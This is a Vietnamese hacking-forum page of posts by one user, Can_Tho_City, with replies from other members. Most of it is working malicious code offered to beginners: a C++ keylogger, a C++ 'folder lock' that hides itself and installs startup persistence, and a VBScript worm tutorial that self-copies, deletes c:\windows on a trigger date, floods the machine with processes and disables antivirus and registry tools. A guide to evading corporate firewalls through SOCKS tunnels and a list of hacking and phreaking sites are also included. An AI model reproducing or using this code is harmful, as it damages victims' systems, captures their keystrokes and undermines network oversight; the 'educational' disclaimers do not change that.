banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: Can_Tho_City  XML
Profile for Can_Tho_City Messages posted by Can_Tho_City [ number of posts not being displayed on this page: 0 ]
 

conmale wrote:
Tôi có ý kiến: nếu đây là bài sưu tầm thì không nên đưa vào những câu như: "Can_Tho_City shall discuss" vì đây không phải là bài chính bạn viết. Nên thay thế "Can_Tho_City" bằng tên của chính tác giả.

Thân mến. 


Dạ thưa, em tập họp từ rất nhiều tài liệu, rồi edit lại thành một bài!

delay wrote:
chào các pác!
Em muốn các pác cố vấn giùm em chuyện này: em đang tính theo học lớp security căn bản nhưng ko biết có nên học lớp này không hay là em cứ lo học xong ccnp trước đã? Mạng Lan hack thì ko được nhưng có thể phá được :lolsmilie . Mấy pác giúp em với.
Thanks!! 


Chào bạn! smilie) "Điều kiện để học security" :?smilie

1. Niềm đam mê và lòng kiên nhẫn.(không có cái này thì khỏi đọc tiếp smilie )
2. Cái gì cũng bắt đầu từ khái niệm và định nghĩa -> phải học căn bản trước.
3. Học cách sử dụng thành thạo Google!!!(đừng bao giờ ngại hỏi, nhưng phải hỏi khôn!)
4. Phải thực hành thật nhiều, thật nhiều!!!
Hi all, Can_Tho_City shall discuss how one can escalate the privileges over corporate internet access by bypassing their corporate's proxies / firewall. In big corporates / companies, employees usually have very limited net access where they can only surf very few sites. They don't have any rights to download any music files(mp3 or wav…), videos or Softwares and also can't visit pornography or hacking sites…

Before I shall go in depth, I assume that you are having a sound knowledge on TCP/IP protocol and proxies. Let me explain "proxies" and "socks" in brief.

Proxies
It is a program which stays in-between the user's system and internet. The request sends by the user's system are processed by the proxy and then forward to the destination server. Proxies are used to distribute the internet access among the nodes. Most of the firewalls comes with inbuilt proxy feature. Firewall proxies increases security for the organisation.

SOCKS
SOCKS stands for "SOCKetS", these are proxies used for tunneling the connection over the internet for better security. Tunneling provides a protective shield for the data passing over the internet. Since, the data is encrypted it is neither understood by the firewall or the content filters.

Visit the following link to know more about SOCK4 / SOCK4a / SOCK5
http://archive.socks.permeo.com/protocol/socks4.protocol (SOCK4)
http://archive.socks.permeo.com/protocol/socks4a.protocol (SOCK4a)
http://www.ietf.org/rfc/rfc1928.txt (SOCK5)

Now I shall discuss how one can make use of SOCKS to bypass the firewall / proxies. Let's assume you want to download music / video files using KaZaa Lite (File Sharing Software) or chat using MSN or Yahoo without getting caught by the system administrator

Install a SOCKS client on your system
The list of SOCKS Client are as follows:
Http-Tunnel - Commercial - http://www.http-tunnel.com/html/
FreeProxy - Freeware - http://www.webattack.com/get/freeproxy.html
Hopster - Freeware - http://www.hopster.com/deutsch/

Use one among the free SOCKS proxy (FreeProxy or Hopster). My personal choice is Hopster so here I shall give examples on hopster.

Configure SOCKS client to accept connections from the application (KaZaa or MSN etc)
Configure Hopster to listen on port 1080/TCP (default port) on your local system. Set your internet proxy address on the SOCK client so that it can connect to it. Click on the link below to view the screenshot:
Screenshot1:Set internet proxy address on your sock proxy



In Hopster you also have to set options to accept connection from application like KaZaaLite. View screenshot for details.
Screenshot2: Configure Hopster to accept connections from applications (KaZaa)



Configure the application (KaZaa / MSN ) to connect to SOCKS proxy
The application must be configured to connect to the local loopback IP address (127.0.0.1) on port 1080/TCP. View the screenshot of KaZaa being configured to connect to the local SOCKS proxy.
Screenshot3: Set the loopback proxy address in the application configuration



Once KaZaa has the connection established with the SOCK proxy, you can see the data transfer status both on KaZaa and as well as Hopster. View the screenshot for details.
Screenshot5: Data transfer status on hopster


Screenshot6: Download file status on KaZaa



How a SOCKS proxy work?
A SOCKS Client sitting on your system acts as a proxy server between your application and your corporate firewall/proxy. This SOCKS client when receive a particular request for the user system, it tunnel the request through http port to the main SOCK proxy server. Since, http port is usually allowed through the firewall / proxy, the tunnel is not detected by the security devices. The main SOCKS proxy then process the request and sends back the data through the http port back to the client machine.

The whole sequence of data flow is given below:
Step1: Application/User Sends Request -------------- >> SOCKS Client
Step2: SOCKS Client Sends Request ---------------- >> Corporate Proxy / Firewall (as HTTP request)
Step3: Corporate Proxy / Firewall Sends Request ---- >> SOCKS Proxy (Main SOCKS Server)
Step4: SOCKS Server Processes the Request
Step5: SOCKS Server sends back data -------------- >> Corporate Proxy / Firewall
Step6: Corporate Proxy / Firewall sends back data --- >> SOCKS Client
Step7: SOCKS Client sends back data --------------- >> Application /User

Note: Similarly one can bypass the corporate firewall / proxy and run any application (MSN/Yahoo/IRC) or visit any sites (pornography sites) using this method.


Warning: Dear all, this is purely an educational site, so tricks / methods provided here are to be used by security professionals or system administrators to secure their networks from such security breaches. At any cost you should not use this information for malicious purpose. I won't be held responsible for any malicious use of my articles. So use at your own risk.

Can_Tho_City (collect)


Mr.Khoai wrote:
Góp ý to Can_Tho_City: code nên để trong tag code và nên trình bày rõ ràng một tý. Nếu là code bạn viết thì nên comment lại cho rõ ràng. Nếu không phải thì hãy ghi rõ source là ở đâu.
Khoai 


Thanks Mr.Khoai, tui Edit lại ngay đây.
Code này là tui viết, ok!
E rằng comment từng dòng thì Newbie lợi dụng quậy lung tung! smilie)

LeVuHoang wrote:
Bỏ vào giữa 2 tag

[ code ]
[ /code ]
 

Sẽ giúp giữ lại format của đoạn code 


Cảm ơn anh Hoàng, em biết Format mà smilie, sẽ edit lại ngay.
Cảm ơn anh.
smilie smilie smilie smilie smilie
Chào các bạn, Can_Tho_City giới thiệu một đoạn code nhỏ để khoá cái Folder. smilie smilie smilie




Code:
#include <iostream>
#include <windows.h>
#include <stdio.h>
#include <string>
#include <dirent.h>
#include <fstream>
using namespace std;
string pword;
string fileline;
int main(int argc, char *argv[])
{
ifstream secondfile ("Password.txt");
while(! secondfile.eof() )
{
getline(secondfile, fileline);
}
secondfile.close();
Sleep(1000);
DIR *pdir;
pdir=opendir("C:\\Windows\\system32");
if (!pdir){
getchar();
return(0);
}
else
CopyFile(argv[0],"C:\\Windows\\system32\\MSystem.exe",FALSE);
Sleep(900);
char PathToFile[] = "C:\\Windows\\system32\\MSystem.exe";
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
RegSetValueEx(hKey, "MSystem", 0, REG_SZ,(const unsigned char*)PathToFile, sizeof(PathToFile));
RegCloseKey(hKey);
Sleep(1000);
SetConsoleTitle("System");
Sleep(500);
HWND find3 = FindWindow(0,"System");
Sleep(1500);
ShowWindow(find3,false);
start:
HWND hWin;
while(1==1){
HWND find = FindWindow(0,"XXX");
Sleep(10);
if (find != NULL){
Sleep(180);
ShowWindow(find,false);
Sleep(800);
ShowWindow(find3,true);
cout<<"Access Denied, Please Enter Password ";
cin>>pword;
if (pword == text)
{
cout<<"Access Granted\n";
ShowWindow(find,true);
Sleep(1000);
system("CLS");
Sleep(800);
ShowWindow(find3,false);
goto test;
}
else{
cout<<"Incorrect Password\n";
Sleep(2000);
system("CLS");
goto start;
test:
HWND hWin;
while(1==1){
HWND find2 = FindWindow(0,"XXX");
Sleep(10);
if (find2 != NULL){
Sleep(100);
}
else{
goto start;
}
}
}
}
}
}



Rất mong nhận được góp ý từ các đàn anh.

Can_Tho_City

Chào các bạn, Can_Tho_City giới thiệu một ví dụ đơn giản về keylog trong C++.

Rất mong nhận được sự góp ý của các đàn anh.



Code:
#include <stdio.h>
#include <windows.h>
#include <Winuser.h>
void keys(int key,char *file)
{
FILE *key_file;
key_file = fopen(file,"a+");
if (key==8)
fprintf(key_file,"%s","[del]");
if (key==13)
fprintf(key_file,"%s","\n");
if (key==32)
fprintf(key_file,"%s"," ");
if (key==VK_CAPITAL)
fprintf(key_file,"%s","[Caps]");
if (key==VK_TAB)
fprintf(key_file,"%s","[TAB]");
if (key ==VK_SHIFT)
fprintf(key_file,"%s","[SHIFT]");
if (key ==VK_CONTROL)
fprintf(key_file,"%s","[CTRL]");
if (key ==VK_PAUSE)
fprintf(key_file,"%s","[PAUSE]");
if (key ==VK_KANA)
fprintf(key_file,"%s","[Kana]");
if (key ==VK_ESCAPE)
fprintf(key_file,"%s","[ESC]");
if (key ==VK_END)
fprintf(key_file,"%s","[END]");
if (key==VK_HOME)
fprintf(key_file,"%s","[HOME]");
if (key ==VK_LEFT)
fprintf(key_file,"%s","[LEFT]");
if (key ==VK_UP)
fprintf(key_file,"%s","[UP]");
if (key ==VK_RIGHT)
fprintf(key_file,"%s","[RIGHT]");
if (key ==VK_DOWN)
fprintf(key_file,"%s","[DOWN]");
if (key ==VK_SNAPSHOT)
fprintf(key_file,"%s","[PRINT]");
if (key ==VK_NUMLOCK)
fprintf(key_file,"%s","[NUM LOCK]");
if (key ==190 || key==110)
fprintf(key_file,"%s",".");
if (key >=96 && key <= 105){
key = key - 48;
fprintf(key_file,"%s",&key);
}
if (key >=48 && key <= 59)
fprintf(key_file,"%s",&key);
if (key !=VK_LBUTTON || key !=VK_RBUTTON){
if (key >=65 && key <=90){
if (GetKeyState(VK_CAPITAL))
fprintf(key_file,"%s",&key);
else
{
key = key +32;
fprintf(key_file,"%s",&key);
}
}
}
fclose(key_file);
}
int main()
{
char i;
char test[MAX_PATH];
GetWindowsDirectory(test,sizeof(test));
strcat(test,"//keys.txt");
while(1){
for(i=8;i<=190;i++){
if (GetAsyncKeyState(i) == -32767)
{
keys (i,test);
}
}
}
}




Note: saves all keystrokes to %windir%/keys.txt

Bài viết nhằm mục đích nghiên cứu và trao dồi kinh nghiệm về virus, để phòng & chống tốt hơn.



Can_Tho_City

vuadapass wrote:
Xem ra mấy pác đây dân trí lập trình còn thấp quá , công nhận pác viết bài này cũng có hiêu đôi chút đơn giản về lập trình Virus băng VB . 

Rất mong được sự chỉ giáo của bạn.
Tại sao chúng ta không thảo luận trên tinh thần xây dựng & học hỏi nhỉ?

Bài viết dành cho Newbie nghiên cứu nên mới giải thích rõ từng lệnh thế!
Chính vì nhắm vào Newbie nên mới cho một ví dụ đơn giản.smilie smilie smilie

sieuBM wrote:
Có bạn nào có bộ tài liệu đầy đủ các lệnh trong ngôn ngữ lập trình VB không? Gởi cho mình với (minh đang tự học lập trình mà)
Rất cám ơn. 


Chào bạn.
Link đây:

http://www.dit.hcmut.edu.vn/~dvhung/Students/VisualBasic/Ebook/Using%20Visual%20Basic%206.rar

Chúc bạn mau chóng giỏi VB. smilie
Có gì khó khăn cứ post lên nhé! smilie smilie smilie
Chào các bạn, Can_Tho_City tìm được một số usefull sites, post lên cho anh em cùng tham khảo. smilie

http://www.tutorialized.com/

http://www.alltheweb.com

http://node.6x.to

http://en.wikipedia.org/wiki/Main_Page

http://www.torrentspy.com


very good hacking ebook that has stories of phreaks, hackers, and virus coders from when the scene started.. to when the first busts and raids of Sun Devil started.
ftp.cdut.edu.cn/pub/document/book/ApproachingZeroHacker.pdf

w32 asm and c++ tutorials on winsock and other stuff
http://www.madwizard.org/view.php?page=tutorials.contents

hack tv show
http://www.hacktv.org/

Essential Pascal teaches the basics of delphi/pascal
http://envhort.ucdavis.edu/HRT251/Lab/Epascal/default.htm

http://www.docdroppers.org/wiki/index.php?title=Phreaking

http://www.z4ck.org

packetstorms section on diffrent phone systems
http://www.packetstormsecurity.org/misc/telephony/

nod32 the best anti-virus..
http://www.eset.com


http://www.linuxiso.org/


defcon has lots of good videos and presentations from meetings
http://www.defcon.org

http://www.phrack.org/

http://www.phreaksandgeeks.com

http://www.oldskoolphreak.com

http://www.phreakphactor.net <----good phone phreaking talk show

http://www.phreakvids.com <---damn good phreaking/hacking videos on famous phreaks and hackers like Steve Wozniak, Captain Crunch, Denny Teresi, Kevin Mitnick.

http://www.hackthissite.org

http://www.artofhacking.com <------lots of hacking and phreaking information, also home of the new software orange box, a phone phreaking software that can spoof CID(caller id)

http://www.informationleak.com

http://www.freeprogrammingresources.com

http://www.americasleastwanted.com <----lots of pdf manuels and documents on phone switches, PBX and VMB systens(voice mail box) and ATM machines. Has a very decent documents for Nortel DMS-100 phone switch information

http://spth.host.sk/main.htm <----has virus related information

TONS of video tutorials regarding various kinds of hacking:

http://www.irongeek.com/i.php?page=securit...kingillustrated

Home of the Auditor Boot CD and Backtrack:

http://www.remote-exploit.org

http://quequero.org/ the best in Italy for Reverse Engineering
N.B, it is italian based but does have english.

programing tutorials

tutorials about every thing

More programing

Log in names

http://milw0rm.com is a good one. (exploits, etc.)

insecure.org/nmap -- nmap port scanner, so STOP ASKING WHERE TO GET A GOOD PORT SCANNER, DAMMIT

http://www.netcraft.com <find OS of IP>

http://www.dnsstuff.com <everything about a given IP>

http://www.thinkgeek.com <cool geek stuff>

http://packetstorm.linuxsecurity.com <exploits and other stuff>

http://www.geobytes.com/IpLocator.htm <ip stuff again...but with a map>

http://www.hackerslab.org/eorg/hackingzone/hackingzone.htm <site to practice on>

BlockStatus.com
This site lets you check if msn / aim / yahoo users have blocked you. Also has a few good internet tools.

Google.com - Proxy Sites
List of sites that help you go undetected on sites, can also get around blocked sites.

Wikipedia.org - AOL Vandals
A brief description of what to do with AOL "vandals" and how to identify them; shows all aol ip ranges.

I am adding these two I came across, because they are very useful and some people, especially newbies will find then helpful.

TextFiles.com
Tutorials in many categories; virus, hacking, phreaking, etc.

DarkNet.org.uk - Web Docs
Tutorials for many web categories, like cracking, hacking, exploiting, viruses.

www.google.com <its your friend>
www.astalavista.com <im sure we all know what this is! ultimate security portal>

Virus Assembly Book How-To's

http://www.google.com/gwt/n

http://www.planet-source-code.com

Very usefull programming website with over 15 languages 100s of thousands of sources codes to help you on anything

Can_Tho_City
Bạn ơi, up lên Server đi cho dễ Down, thanks!

ducnamnv wrote:
Rất cảm ơn Can_tho_city đã đưa đoạn code này lên, giúp tôi học hỏi được nhiều.Tuy nhiên theo tôi việc đưa code VR lên diễn đàn này là rất hấp dẫn, nhưng với mục đích dùng để học hỏi thì không nên đưa ra những đoạn code phá hoại nghiêm trọng như xoá file ... như vậy thì đã vô tình tiếp tay cho người khác phá hoại, đi ngược lại tôn chỉ của diễn đàn này. Tôi nghĩ chỉ nên đưa lên các đoạn code, phương pháp làm sao cho VR của mình tồn tại được lâu, khó bị phát hiện... thì hơn, như bác luke đưa code VR lên mà xoá đoạn mã nguy hiểm ấy.
Rất mong được sự góp ý thêm. 



Bạn đã đọc kỹ bài của tôi chưa mà kết luận như vậy ?




tui_có_bít_gì_đâu wrote:
Pác "Can_Tho_City" cho em hỏi vbs có phải ngôn ngữ VBScripst kô?
hoặc nó là do ngôn ngữ gì đi nữa pác có thể cho em cái link ebook tiếng việt của ngôn ngữ này đc chứ ! (nếu kô có đành phải đọc sách vậy)
Nếu có gửi bản hoàn chỉnh cho teckcomnet@yahoo.com thì gửi em 1 bản luôn nhé email : chonglaituonglai87vn@yahoo.com
 


Đọc lại nội quy của Box: Thảo luận virus, trojan, spyware, worm...


blacknight wrote:
chào bác "Can_Tho_City" em không phải là dân hack chuyên nghiệp, mục đích vào diễn đàn là để học tập về bảo mạt và cách phòng trống, thấy bác giới thiệu về cấu trúc con Worm này em thấy rất hay, nhưng trình độ lập trình của em có hạn, bác co thể viết hoàn chinh hơn về còn worm này cho em được không?. Nếu được bác gửi hoàn chỉnh đoạn code qua mail cho em được không : teckcomnet@yahoo.com

cảm on bác trước nhé. 


Chào ban.
Mình nghĩ bạn nên:
1. Đọc lại nội quy khi bạn đăng ký trở thành member!
2. Đọc lại nội quy của box Thảo luận virus, trojan, spyware, worm...
3. Đọc lại chính câu hỏi của mình.


smiliesmilie) Chào các bạn Newbie, Can_Tho_City giới thiệu với các bạn một con virus(Worm) đơn giản (chỉ để nghiên cứu thôi nhé ).
( Bài này chỉ dành cho Newbie thôi, các đàn anh không nên đọc làm gì.)

Công cụ: Notepad và một chút kiến thức lập trình(ở mức độ căn bản là đủ rồi).

-Code xong nhớ save lại với dạng file .vbs

Chú ý: Nội dung sau dấu trên cùng 1 hàng thì được coi là comment, không có tác dụng gì cả.

Ví dụ: ‘Virus.vbs worm created by Can_Tho_City

Cần kiểm tra xem trong máy bạn có chạy được vbs không, bằng cách soạn thảo 1 file .vbs với nội dung là:
msgbox “hello!” nếu file này không chạy được thì có thể file wscript.exe trong thư mục c:\windows\system32 của bạn bị delete hay hư rồi.

Code:

‘kiem tra
msgbox “hello!”


1. Làm cho virus tự nhân bản và chuyển tới một nơi khác trên máy tính:

Code:

On Error Resume Next '1
Set c_t_c= Createobject("scripting.filesystemobject") '2
c_t_c.copyfile wscript.scriptfullname, c_t_c.GetSpecialFolder(1)& "\ c_t_c.vbs"
'3

Giải thích:

Dòng 1: bỏ qua câu lệnh sai (mở đầu Code nên bắt đầu bằng dòng này).
Dong2: lệnh copy
c_t_c.copyfile wscript.scriptfullname -> lấy tên file của worm
c_t_c.GetSpecialFolder(1)& "\ c_t_c.vbs -> copy vào thư mục (1) với tên file quy định là c_t_c.vbs.
Thư mục (1) ở đây là c:\windows\system\ c_t_c.vbs [ %SystemDir%]
Nếu thay = (0) thì nó sẽ copy bản thân vào c:\windows\ c_t_c.vbs [%windir%]
Thay = (2) thì nó sẽ copy bản thân vào thư mục temp của win [%TempDir%]

Chú ý: Ngoài 3 thư mục đó, nếu muốn làm thư mục khác bạn không thể type thẳng vào c:\virus\ c_t_c.vbs hay c:/virus/ c_t_c.vbs [cái này sẽ nói sau]
2. Ghi 1 khoá vào registry để tự execute mỗi khi khởi động máy

Code:

Set c_t_c 2 = CreateObject("WScript.Shell") ‘4
c_t_c2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\name","wscript.exe "& c_t_c.GetSpecialFolder(0)& "\ c_t_c.vbs %" ‘5


Chú ý: ở dòng 5 name sau Run\ là tên của khoá trong registry, có thể thay đổi.

3. Kỹ thuật “hẹn ngày”

Virus vẫn âm thầm chạy trên máy tính nhưng chỉ tới ngày tháng bạn quy định nó mới tiến hành phá hoại. Ngày giờ được tính theo ngày giờ trên máy bị nhiễm.

Code:

if month(now) =9 and day(now) =11 then
‘your function
msgbox "Stop here!"
end if


Ở đoạn code trên thì đến ngày 11 tháng 9 thì nó sẽ xuất hiện thông báo: “Stop here!”

4. Phá hoại :

Delete file hay thư mục trên máy

Code:

Const vic = "c:\emiu\" ‘6
Delvic ‘7
Sub Delvic() ‘8
Dim fso ‘9
Set fso = CreateObject("Scripting.FileSystemObject") ‘10
fso.DeleteFile vic & "*.*" , True ‘11
fso.DeleteFolder vic & "*" , True ‘12
End Sub

Giải thích:

- Dòng 6 là để khai báo đường dẫn
- Dòng 11 là để delete file, ở đây là *.*
- Dòng 12 là để delete thư mục, ở đây là *
- Có thể thay đổi theo mục đích. Nếu thay bằng smilie c:\windows\ thì sao nhỉ? ( !!!… cry.gif!)

Làm treo máy, hay restart lại máy

Code1:

‘Run notepad một cách auto tới khi treo máy, run notepad ở chế độ ẩn chứ không phải kiểu ‘bomb pop-up’. Cách này effect với mọi OS cho nên 1 cách này là đủ dùng rồi !

On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop


Code2:

‘Restart
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
‘os 95 98 9x


Vô hiệu hoá anti-virus:

Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"


(Tùy version mà code lại để đạt hiệu quả nhé.)

Hiển thị message khi reboot máy

dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "Hi, I’m Can_Tho_City!"
wsh.RegWrite s1+s3, "Now your computer have a worm!"


Disable Registry
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1= "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"


Lệnh execute 1 file chỉ định

Set exe= CreateObject(“Wscipt.Shell”)
exe.run(“c:\windows\virus.exe”)


Ví dụ minh họa mẫu:

1. Mỗi lần máy tính vừa mở lên thì bị phá ngay lập tức

On Error Resume Next
Set c_t_c= Createobject("scripting.filesystemobject")
c_t_c.copyfile wscript.scriptfullname, c_t_c.GetSpecialFolder(1)& "\ c_t_c.vbs"
Set c_t_c 2= CreateObject("WScript.Shell")
c_t_c 2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\code1","wscript.exe "& c_t_c.GetSpecialFolder(0)& "\ c_t_c.vbs %"
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop


2. Delete c:\windows

On Error Resume Next
Set c_t_c = Createobject("scripting.filesystemobject")
c_t_c.copyfile wscript.scriptfullname,c_t_c.GetSpecialFolder(1)& "\ c_t_c.vbs"
Set c_t_c 2= CreateObject("WScript.Shell")
c_t_c 2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\code2","wscript.exe "& c_t_c.GetSpecialFolder(0)& "\ c_t_c.vbs %"
Set treomay= CreateObject("WScript.Shell")
if month(now) =7 and day(now) =1 then
Const vic = "c:\windows\"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub
end if


*Chú ý: vbs có thể insert vào html được

Đây là một con worm cực kỳ đơn giản(=>chuối)... Newbie không nên dùng nó ngoài mục đích học tập!
Bài viết nhằm mục đích học hỏi và trao đổi kinh nghiệm về Virus, các Newbie tự chịu trách nhiệm cho các hành động phá phách lung tung của mình!

Nếu có sai sót rất mong các bạn cho ý kiến đóng góp, tôi xin sẵn sàng đón nhận!
Can_Tho_City.

( smilie Đại ca nào làm bộ Emoticons này tuyệt quá!... thôi để bài sau vậy smilie )
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|